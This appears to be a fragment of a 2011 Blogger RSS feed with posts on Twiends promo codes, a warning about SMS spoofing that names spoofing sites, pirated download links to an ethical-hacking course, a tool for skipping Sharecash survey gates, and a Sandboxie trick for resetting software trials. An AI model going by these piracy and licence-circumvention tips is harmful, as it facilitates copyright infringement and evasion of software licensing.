class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-2727490048401543181?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/JaQNbAsE7FMATKxqJBgqUNk5gfI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JaQNbAsE7FMATKxqJBgqUNk5gfI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/JaQNbAsE7FMATKxqJBgqUNk5gfI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JaQNbAsE7FMATKxqJBgqUNk5gfI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/pDDUbLeWSHU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/pDDUbLeWSHU/notification-for-paypal-users-in-india.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/03/notification-for-paypal-users-in-india.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-4550644241898472504</guid><pubDate>Thu, 03 Mar 2011 18:07:00 +0000</pubDate><atom:updated>2011-03-03T10:07:13.144-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">twiends</category><category domain="http://www.blogger.com/atom/ns#">recharge</category><category domain="http://www.blogger.com/atom/ns#">exchange</category><category domain="http://www.blogger.com/atom/ns#">credits</category><category domain="http://www.blogger.com/atom/ns#">traffic</category><category domain="http://www.blogger.com/atom/ns#">points</category><category domain="http://www.blogger.com/atom/ns#">likes</category><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Free</category><category domain="http://www.blogger.com/atom/ns#">.com</category><category domain="http://www.blogger.com/atom/ns#">promotional</category><category domain="http://www.blogger.com/atom/ns#">codes</category><title>Twiends Promotional Codes.... Enter to get free credits on Twiends.com</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;Twiends.com is the site for traffic Exchange &lt;/b&gt;&lt;br /&gt;&lt;b&gt;here are few codes to get Free credits on Twiends.com&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;LK4W2Q (50 credits)&lt;br /&gt;54MU1W (50 credits)&lt;br /&gt;AX2KRZ (50 credits)&lt;br /&gt;KE3YZ1 (75 credits)&lt;br /&gt;98HJ1A (75 credits)&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-4550644241898472504?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/61wOf4_5N7fcJ98azpe5dtu6X8k/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/61wOf4_5N7fcJ98azpe5dtu6X8k/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/61wOf4_5N7fcJ98azpe5dtu6X8k/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/61wOf4_5N7fcJ98azpe5dtu6X8k/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/WIm7t36p588" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/WIm7t36p588/twiends-promotional-codes-enter-to-get.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/03/twiends-promotional-codes-enter-to-get.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-4663156721005750208</guid><pubDate>Sat, 26 Feb 2011 10:27:00 +0000</pubDate><atom:updated>2011-02-26T02:27:01.086-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">cool</category><category domain="http://www.blogger.com/atom/ns#">news</category><category domain="http://www.blogger.com/atom/ns#">check</category><category domain="http://www.blogger.com/atom/ns#">id</category><category domain="http://www.blogger.com/atom/ns#">SMS</category><category domain="http://www.blogger.com/atom/ns#">beware</category><category domain="http://www.blogger.com/atom/ns#">mobile</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">spoof</category><category domain="http://www.blogger.com/atom/ns#">beginner</category><category domain="http://www.blogger.com/atom/ns#">fraud</category><category domain="http://www.blogger.com/atom/ns#">spoofing</category><category domain="http://www.blogger.com/atom/ns#">trick</category><title>Don’t fall prey to mobile spoofing</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div id="p-tag"&gt;Have you ever received a weird SMS from a friend which he  or she later claimed never to have sent? You are lucky if you haven’t  because more and more people in the city are falling prey to mobile  spoofing where one can send SMS from any number without touching the  actual phone. All one needs to do is to login to a certain website,  register and start sending messages to any one in India with someone  else’s mobile number.&lt;/div&gt;&lt;div id="p-tag"&gt;After Internet Protocol (IP) or caller ID faking, mobile  spoofing is the new security threat that has hit the country. Though the  technology has been around for sometime, it is of late catching up with  youths in the city. Ethical hackers warn that while many youngsters  think they are playing a prank, it may turn out to be a major security  risk if some terrorist or anti-social elements get involved in it.&lt;/div&gt;&lt;div id="p-tag"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div id="p-tag" style="text-align: center;"&gt;&lt;img alt="http://lh5.ggpht.com/_kWGvruOyW-U/SykMuM4Pz3I/AAAAAAAAAcs/7pL59B92U6Y/bd_addr-spoofing.jpg" src="http://lh5.ggpht.com/_kWGvruOyW-U/SykMuM4Pz3I/AAAAAAAAAcs/7pL59B92U6Y/bd_addr-spoofing.jpg" /&gt; &lt;/div&gt;&lt;div id="p-tag"&gt; &lt;/div&gt;&lt;div id="p-tag"&gt;According to cyber crime experts, the person receiving the  SMS will not know whether the message is fake or not. The websites  facilitating mobile spoofing exploit certain security vulnerabilities to  obtain access to the SMS-Internet tunnel by creating a malicious code.  Even the mobile service provider is not aware when the network is being  misused. &lt;/div&gt;&lt;div id="p-tag"&gt;Says additional SP (cyber crimes) U. Rammohan, “We can  trace the sender of the fake messages through the IP address, but it is  quite a challenging task,” he points out.&lt;/div&gt;&lt;div id="p-tag"&gt;Mobile spoofing websites offer both free and paid SMS  spoofing services. The popular websites among youngsters are:  xxsidxx.co.cc, fakemsg.com, fakemytext.com, www.sneaksms.com and sms.fake.com. There’s also a dedicated software called “SMS spoof” which is freely available on the Internet.&lt;/div&gt;&lt;div id="p-tag"&gt;Ethical hackers blame mobile companies for this. “They  need to set up advanced authentication mechanisms. SMS servers are  hugely vulnerable since they are not properly secured,” observes  networking security engineer M.M. Ganga Raju. “The only way to detect  and block spoofed messages is to screen incoming messages to verify that  the sender is a valid subscriber,” he adds.&lt;/div&gt;&lt;div id="p-tag"&gt; “You can send an SMS from a website to a woman using her  husband’s number informing her to hand over money to a person he  deputes, because of which chances are that she may hand over the money  to the impostor,” says ethical hacker M.V. Rama Rao.&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-4663156721005750208?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/_aPnoWSHvKkdQW7DZjSH2oV_4S0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_aPnoWSHvKkdQW7DZjSH2oV_4S0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/_aPnoWSHvKkdQW7DZjSH2oV_4S0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_aPnoWSHvKkdQW7DZjSH2oV_4S0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/8T8qB46kCK0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/8T8qB46kCK0/dont-fall-prey-to-mobile-spoofing.html</link><author>noreply@blogger.com (ArtistAshish)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://lh5.ggpht.com/_kWGvruOyW-U/SykMuM4Pz3I/AAAAAAAAAcs/7pL59B92U6Y/s72-c/bd_addr-spoofing.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/dont-fall-prey-to-mobile-spoofing.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-5580749185871904603</guid><pubDate>Thu, 24 Feb 2011 10:40:00 +0000</pubDate><atom:updated>2011-02-24T05:28:39.486-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Easy</category><category domain="http://www.blogger.com/atom/ns#">course</category><category domain="http://www.blogger.com/atom/ns#">e-book</category><category domain="http://www.blogger.com/atom/ns#">for</category><category domain="http://www.blogger.com/atom/ns#">ebook</category><category domain="http://www.blogger.com/atom/ns#">download</category><category domain="http://www.blogger.com/atom/ns#">archive</category><category domain="http://www.blogger.com/atom/ns#">learning</category><category domain="http://www.blogger.com/atom/ns#">tutorial</category><category domain="http://www.blogger.com/atom/ns#">ethical</category><category domain="http://www.blogger.com/atom/ns#">workshop</category><category domain="http://www.blogger.com/atom/ns#">hack</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">module</category><title>Ethical Hacking -E-books Course Download for Easy Learning</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Certied Ethical Hacking and Countermeasure Course v6.12 AIO&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Well here is the perfect collection of CEH to be a Professional CEH&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.google.co.in/url?source=imgres&amp;amp;ct=img&amp;amp;q=http://powerideaz.com/wp-content/uploads/2009/01/hacker.jpg&amp;amp;sa=X&amp;amp;ei=3FxmTaDEOMPxrQeH3pDGCA&amp;amp;ved=0CAQQ8wc&amp;amp;usg=AFQjCNGYt1E49Blshc_UqR6hiEBXfC2qzw" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.google.co.in/url?source=imgres&amp;amp;ct=img&amp;amp;q=http://powerideaz.com/wp-content/uploads/2009/01/hacker.jpg&amp;amp;sa=X&amp;amp;ei=3FxmTaDEOMPxrQeH3pDGCA&amp;amp;ved=0CAQQ8wc&amp;amp;usg=AFQjCNGYt1E49Blshc_UqR6hiEBXfC2qzw" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;CEH-Classroom-Lab-Setup-v6.pdf&lt;br /&gt;CEHv6 Module 00 Student Introduction.pdf&lt;br /&gt;CEHv6 Module 01 Introduction to Ethical Hacking.pdf&lt;br /&gt;CEHv6 Module 02 Hacking Laws.pdf&lt;br /&gt;CEHv6 Module 03 Footprinting.pdf&lt;br /&gt;CEHv6 Module 04 Google Hacking.pdf&lt;br /&gt;CEHv6 Module 05 Scanning.pdf&lt;br /&gt;CEHv6 Module 06 Enumeration.pdf&lt;br /&gt;CEHv6 Module 07 System Hacking.pdf&lt;br /&gt;CEHv6 Module 08 Trojans and Backdoors.pdf&lt;br /&gt;CEHv6 Module 09 Viruses and Worms.pdf&lt;br /&gt;CEHv6 Module 10 Sniffers.pdf&lt;br /&gt;CEHv6 Module 11 Social Engineering.pdf&lt;br /&gt;CEHv6 Module 12 Phishing.pdf&lt;br /&gt;CEHv6 Module 13 Hacking Email Accounts.pdf&lt;br /&gt;CEHv6 Module 14 Denial of Service.pdf&lt;br /&gt;CEHv6 Module 15 Session Hijacking.pdf&lt;br /&gt;CEHv6 Module 16 Hacking Webservers.pdf&lt;br /&gt;CEHv6 Module 17 Web Application Vulnerabilities.pdf&lt;br /&gt;CEHv6 Module 18 Web based Password Cracking Techniques.pdf&lt;br /&gt;CEHv6 Module 19 SQL Injection.pdf&lt;br /&gt;CEHv6 Module 20 Hacking Wireless Networks.pdf&lt;br /&gt;CEHv6 Module 21 Physical Security.pdf&lt;br /&gt;CEHv6 Module 22 Linux Hacking.pdf&lt;br /&gt;CEHv6 Module 23 Evading IDS Firewall and Honeypot.pdf&lt;br /&gt;CEHv6 Module 24 Buffer Overflows.pdf&lt;br /&gt;CEHv6 Module 25 Cryptography.pdf&lt;br /&gt;CEHv6 Module 26 Penetration Testing.pdf&lt;br /&gt;CEHv6 Module 28 Writing Virus Codes.pdf&lt;br /&gt;CEHv6 Module 29 Assembly ******** Tutorial.pdf&lt;br /&gt;CEHv6 Module 30 Exploit Writing.pdf&lt;br /&gt;CEHv6 Module 31 Exploit Writing.pdf&lt;br /&gt;CEHv6 Module 32 Exploit Writing.pdf&lt;br /&gt;CEHv6 Module 33 Reverse Engineering Techniques.pdf&lt;br /&gt;CEHv6 Module 34 MAC OS X Hacking.pdf&lt;br /&gt;CEHv6 Module 35 Hacking Routers, Cable Modems and Firewalls.pdf&lt;br /&gt;CEHv6 Module 36 Hacking Mobile Phones, PDA and Handheld Devices.pdf&lt;br /&gt;CEHv6 Module 37 Bluetooth Hacking.pdf&lt;br /&gt;CEHv6 Module 38 VoIP Hacking.pdf&lt;br /&gt;CEHv6 Module 39 RFID Hacking.pdf&lt;br /&gt;CEHv6 Module 40 Spamming.pdf&lt;br /&gt;CEHv6 Module 41 Hacking USB Devices.pdf&lt;br /&gt;CEHv6 Module 42 Hacking Database Servers.pdf&lt;br /&gt;CEHv6 Module 43 Cyber Warfare- Hacking Al-Qaida and Terrorism.pdf&lt;br /&gt;CEHv6 Module 44 Internet Content Filtering Techniques.pdf&lt;br /&gt;CEHv6 Module 45 Privacy on the Internet.pdf&lt;br /&gt;CEHv6 Module 46 Securing Laptop Computers.pdf&lt;br /&gt;CEHv6 Module 47 Spying Technologies.pdf&lt;br /&gt;CEHv6 Module 48 Corporate Espionage by Insiders.pdf&lt;br /&gt;CEHv6 Module 49 Creating Security Policies.pdf&lt;br /&gt;CEHv6 Module 50 Software Piracy and Warez.pdf&lt;br /&gt;CEHv6 Module 51 Hacking and Cheating Online Games.pdf&lt;br /&gt;CEHv6 Module 52 Hacking RSS and Atom.pdf&lt;br /&gt;CEHv6 Module 53 Hacking Web Browsers.pdf&lt;br /&gt;CEHv6 Module 54 ***** Server Technologies.pdf&lt;br /&gt;CEHv6 Module 55 Preventing Data Loss.pdf&lt;br /&gt;CEHv6 Module 56 Hacking Global Positioning System.pdf&lt;br /&gt;CEHv6 Module 57 Computer Forensics and Incident Handling.pdf&lt;br /&gt;CEHv6 Module 58 Credit Card Frauds.pdf&lt;br /&gt;CEHv6 Module 59 How to Steal Passwords.pdf&lt;br /&gt;CEHv6 Module 60 Firewall Technologies.pdf&lt;br /&gt;CEHv6 Module 61 Threats and Countermeasures.pdf&lt;br /&gt;CEHv6 Module 62 Case Studies.pdf&lt;br /&gt;CEHv6 Module 63 Botnets.pdf&lt;br /&gt;CEHv6 Module 64 Economic Espionage.pdf&lt;br /&gt;CEHv6 Module 65 Patch Management.pdf&lt;br /&gt;CEHv6 Module 66 Security Convergence.pdf&lt;br /&gt;CEHv6 Module 67 Identifying the Terrorists.pdf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;DOWNLOAD&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Part-1&lt;br /&gt;&lt;a href="http://rapidshare.com/files/193668787/HCv6_Sam_downarchive.part1.rar"&gt;http://rapidshare.com/files/193668787/HCv6_Sam_downarchive.part1.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Part-2&lt;br /&gt;&lt;a href="http://rapidshare.com/files/193668830/HCv6_Sam_downarchive.part2.rar"&gt;http://rapidshare.com/files/193668830/HCv6_Sam_downarchive.part2.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Part-3&lt;br /&gt;&lt;a href="http://rapidshare.com/files/193668755/HCv6_Sam_downarchive.part3.rar"&gt;http://rapidshare.com/files/193668755/HCv6_Sam_downarchive.part3.rar&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: #274e13;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: #274e13;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span style="color: #274e13; font-size: x-large;"&gt;ENJOY..! &lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-5580749185871904603?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YZqeVZy_hYiyKKKq63EA2BzCJCs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YZqeVZy_hYiyKKKq63EA2BzCJCs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YZqeVZy_hYiyKKKq63EA2BzCJCs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YZqeVZy_hYiyKKKq63EA2BzCJCs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/fiG1wsptXDw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/fiG1wsptXDw/ethical-hacking-e-books-course-download.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/ethical-hacking-e-books-course-download.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-807459881542521933</guid><pubDate>Wed, 23 Feb 2011 06:38:00 +0000</pubDate><atom:updated>2011-02-23T00:00:02.969-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">sharecash</category><category domain="http://www.blogger.com/atom/ns#">download</category><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">link</category><category domain="http://www.blogger.com/atom/ns#">Premium</category><category domain="http://www.blogger.com/atom/ns#">mediafire</category><category domain="http://www.blogger.com/atom/ns#">without</category><category domain="http://www.blogger.com/atom/ns#">survey</category><title>Sharecash Downloader: download sharecash files without survey</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;u&gt;&lt;b&gt;sharecash downloader !!!&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;enjoy!&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.earn.onlinewebmarket.net/wp-content/uploads/2010/06/sharecash-money-makes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="173" src="http://www.earn.onlinewebmarket.net/wp-content/uploads/2010/06/sharecash-money-makes.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;here is the download link&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mediafire.com/?hebg45pzqmu0e86"&gt;http://www.mediafire.com/?hebg45pzqmu0e86&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;How to use it:( update :- first&lt;br /&gt;download the sharecash&lt;br /&gt;downloader and then cut off&lt;br /&gt;your internet and then open the&lt;br /&gt;downloader it will give some&lt;br /&gt;error so click on continue and&lt;br /&gt;you are done. Now connect to&lt;br /&gt;internet and follow the belows&lt;br /&gt;step )&lt;br /&gt;1. Type in the Sharecash link you&lt;br /&gt;want to download in the textbox.&lt;br /&gt;2. Click On "Go To Url" button.&lt;br /&gt;4. Wait for 30 seconds - 1&lt;br /&gt;minute. Depends on how fast&lt;br /&gt;your Internet speed is.&lt;br /&gt;5. Click "Download".&lt;br /&gt;6. Then Disable your Download&lt;br /&gt;Processer If you have any&lt;br /&gt;7. Then It will popup something&lt;br /&gt;about sharecash just click on ok&lt;br /&gt;8. Now Your downloading will&lt;br /&gt;start&lt;br /&gt;9. Enjoy Friends&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-807459881542521933?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/QA5zB2uHW_uXO5yW-JJTDyfkFCY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QA5zB2uHW_uXO5yW-JJTDyfkFCY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/QA5zB2uHW_uXO5yW-JJTDyfkFCY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/QA5zB2uHW_uXO5yW-JJTDyfkFCY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/ashisharena/adCx/~4/cY-pGnDaX0c" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ashisharena/adCx/~3/cY-pGnDaX0c/sharecash-downloader-download-sharecash.html</link><author>noreply@blogger.com (ArtistAshish)</author><thr:total>0</thr:total><feedburner:origLink>http://www.ashisharena.com/2011/02/sharecash-downloader-download-sharecash.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6804681555637047946.post-5063118792752351356</guid><pubDate>Wed, 23 Feb 2011 04:59:00 +0000</pubDate><atom:updated>2011-02-22T20:59:04.177-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">sandbox</category><category domain="http://www.blogger.com/atom/ns#">amazing</category><category domain="http://www.blogger.com/atom/ns#">bypass</category><category domain="http://www.blogger.com/atom/ns#">awesome</category><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">tutorial</category><category domain="http://www.blogger.com/atom/ns#">method</category><category domain="http://www.blogger.com/atom/ns#">trial</category><category domain="http://www.blogger.com/atom/ns#">limited</category><category domain="http://www.blogger.com/atom/ns#">trick</category><title>Bypass Trial Version Limitations In Any Software</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;Have you ever downloaded any trial version software and it may have expired before you could have tested it for its full capabilties. In  this trick I will explain to how you can use the trial version of any  software over and again so that you can test the software properly  before purchasing its full version.Basically there are two type of  restrictions put by the software companies on trial version of  softwares.&lt;br /&gt;&lt;br /&gt;1.Disable some features of the software&lt;br /&gt;&lt;br /&gt;2.Time Bound limitations like 5-days Trial version&lt;br /&gt;&lt;br /&gt;This  trick can extend only your time bound limitations hence provide you  with the capability to use the trial version of the software for as long  as you want.&lt;br /&gt;&lt;br /&gt;Another big advantage of this trick is that it will  increase your system security.For this trick we will be using a  freeware software called sandboxie which very small(500 kb).It would  protect your computer from malware andspywares to make changes to your  system. Sandboxie runs the softwares in an isolated enviroment so that  they cannot make permanent changes to your system.Here is the graphical  representation of the programs running with sandboxie in memory.&lt;/b&gt;&lt;br /&gt;&lt;div&gt;&lt;a href="" target="_blank"&gt;&lt;img alt="" src="http://www.orkut.gmodules.com/gadgets/proxy?refresh=86400&amp;amp;container=orkut&amp;amp;gadgets=http%3A%2F%2Forkut.com%2Fimg.xml&amp;amp;url=http%3A%2F%2Fwww.sandboxie.com%2Fimg%2FFrontPage%2FFrontPageAnimation.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Now,here is the step by step tutorial with screenshots on Trick To Bypass Trial Version Limitations In Any Software&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. DOWNLOAD &lt;br /&gt;2. Install and run it.&lt;br /&gt;3. Click on the Sandbox -&amp;gt; DefaultBox –&amp;gt; Run SandBoxed and then click on Run Any Program&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;b&gt;Now a new window will popup.Click on Browse&lt;/b&gt;&lt;div&gt;&lt;a href="" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Locate the setup of the trial software you want to install.Click on open&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;This will open up a new window and delete all the files created, Press the Delete Sandbox button to fully clear the contents.&lt;div&gt;&lt;a href="" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Now reinstall the software as mentioned above and you will again get the full trial version.&lt;br /&gt;&lt;br /&gt;Note:&lt;br /&gt;&lt;br /&gt;1.This trick will not work if you have already used the full trial version of the software without sandboxie.&lt;br /&gt;&lt;br /&gt;2.Sandboxie may crash if you run very large programs with it&lt;br /&gt;&lt;br /&gt;Disclaimer:This tutorial is only for educational purpose and do buy the softwares to get the full capablities of the software.&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Install the software and run it.You will see # in the software tittle &lt;a href="" target="_blank"&gt;bar.It&lt;/a&gt; indicates that the software is running under sandboxie.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;7. You will get the trial of the software and the trial version will expire after the time bound limitation is over.&lt;br /&gt;8. To reuse the software again after the trial version is over click on Click Sandbox –&amp;gt;DefaultBox andclick Delete Contents.&lt;br /&gt;&lt;br /&gt;(Note  icon biggrin Trick To Bypass Trial Version Limitations In Any Software  onot let the software expire.Do these steps before atleast 1-day of the  trial software is left.otherwise the above trick may not work )&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;&lt;b&gt;This will open up a new window and delete all the files created, Press the Delete Sandbox button to fully clear the contents.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Now reinstall the software as mentioned above and you will again get the full trial version.&lt;br /&gt;&lt;br /&gt;Note:&lt;br /&gt;&lt;br /&gt;1.This trick will not work if you have already used the full trial version of the software without sandboxie.&lt;br /&gt;&lt;br /&gt;2.Sandboxie may crash if you run very large programs with it&lt;br /&gt;&lt;br /&gt;Disclaimer:This tutorial is only for educational purpose and do buy the softwares to get the full capablitiesof the software.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;To run any application installed in sandbox&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1)Go to the folder where you have installed sanboxie. Suppose it in F:\ drive.&lt;br /&gt;2)Open "Sandbox" and enter your profile(say my profile is vks in sandboxie so I go to F:\Sandbox\vks )&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3)Open  the box in which you installed your app. by default you should install  in the "Default box"(if you didnt create any other)&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;4)  Now open the folder "drive".In it you'll see your drives.Go to the one  you installed your application in and then create a shortcut to the exe  of the application on your desktop&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6804681555637047946-5063118792752351356?l=www.ashisharena.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/fR-tXmhnH5L1uR8DYjuZRQTOsvc/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fR-tXmhnH5L1uR8DYjuZRQTOsvc/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
